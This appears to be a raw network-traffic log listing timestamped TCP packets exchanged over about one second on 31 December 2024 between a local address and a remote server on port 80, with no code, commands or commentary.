                                                        Dec 31, 2024 09:28:25.874217987 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.874224901 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.874274969 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.874411106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.874423981 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.874489069 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.887990952 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888037920 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888048887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888094902 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.888094902 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.888113976 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888185978 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888197899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888209105 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888221025 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888231993 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.888259888 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.888379097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888396978 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888407946 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888433933 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.888474941 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.888536930 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888549089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888560057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888665915 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.888686895 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888696909 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888708115 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888720036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888731003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888739109 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.888739109 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.888751030 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888780117 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.888955116 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888964891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888982058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.888993025 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889000893 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.889012098 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889023066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889030933 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.889046907 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.889053106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889117002 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.889378071 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889389992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889400959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889411926 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889424086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889439106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889445066 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.889445066 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.889457941 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889473915 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889484882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.889493942 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.889545918 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.891351938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891362906 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891402006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891411066 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.891442060 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891455889 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891462088 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.891501904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.891578913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891590118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891602039 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891633034 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.891699076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891751051 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.891772985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891786098 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891802073 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891813040 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891832113 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.891858101 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.891951084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.891962051 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892007113 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.892136097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892201900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892213106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892242908 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.892296076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892309904 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892348051 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.892385006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892396927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892436981 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.892549992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892560959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892571926 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892582893 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892594099 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892601967 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.892647982 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.892647982 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.892735958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892746925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892812967 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.892890930 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892900944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892915964 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892926931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892936945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892944098 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.892955065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892966032 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892976999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.892992973 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.892992973 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.893033981 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.893548965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893599033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893610001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893641949 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.893666983 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893677950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893690109 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893712044 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.893739939 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.893753052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893858910 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893868923 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893874884 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893886089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893909931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893914938 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.893923998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893949032 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.893949032 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.893956900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.893991947 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.894011974 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.894023895 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.894035101 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.894058943 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.946981907 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.959980011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.960026979 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.960038900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.960091114 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.960151911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.960164070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.960180044 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.960196972 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.960223913 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.960228920 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.960242033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.960330963 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961009026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961042881 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961059093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961117029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961128950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961154938 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961154938 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961186886 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961199045 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961224079 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961368084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961384058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961395979 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961407900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961415052 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961424112 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961438894 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961447001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961483955 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961632013 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961642981 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961653948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961663961 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961674929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961694002 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961694002 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961735010 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961847067 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961862087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961909056 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.961965084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961976051 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.961992979 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.962001085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.962037086 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.962037086 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.975538015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975558996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975569010 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975625038 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975635052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975681067 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.975681067 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.975708961 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975720882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975756884 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.975816965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975862026 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.975939035 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975955963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975967884 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975977898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.975987911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976006985 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.976027012 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.976084948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976099014 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976130962 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.976154089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976167917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976177931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976188898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976201057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976237059 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.976237059 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.976286888 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.976443052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976588011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976598978 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976609945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976620913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976629972 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.976639986 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.976653099 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976664066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976675987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976686001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976696014 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.976705074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.976723909 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.976752043 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.978869915 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.978908062 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.978919029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.978976965 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.978991985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979003906 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979031086 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979159117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979171991 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979188919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979199886 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979226112 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979226112 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979310989 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979330063 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979340076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979351044 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979357958 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979367971 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979398012 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979398012 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979433060 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979444027 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979454041 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979464054 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979475975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979490995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979496002 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979528904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979528904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979604959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979617119 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979626894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979659081 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979738951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979748964 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979759932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979770899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979798079 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979806900 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979818106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979876995 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.979893923 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979903936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979913950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.979952097 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.980031013 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980042934 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980052948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980097055 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.980097055 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.980578899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980647087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980657101 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980727911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980739117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980750084 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.980761051 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980779886 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.980803967 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.980868101 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980880976 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980892897 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980904102 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980921030 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.980940104 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.980940104 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.981528044 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.981561899 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.981586933 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.981599092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.981681108 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.981700897 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.981713057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.981724024 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.981735945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.981774092 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.981774092 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.981882095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.981894970 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.981904984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.981919050 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.982004881 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.982027054 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.982034922 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.982034922 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.982045889 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.982064962 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.025182009 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.263129950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.306324005 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.531076908 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.531143904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.790520906 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.795346022 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.795372963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.795384884 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.795412064 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.796298027 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.801553011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.801565886 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.801578999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.801600933 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.801624060 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.801645041 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.801656008 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.801666975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.801677942 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.801687002 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.801743031 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.801800966 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.801811934 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.801822901 CET804970887.120.113.91192.168.2.8
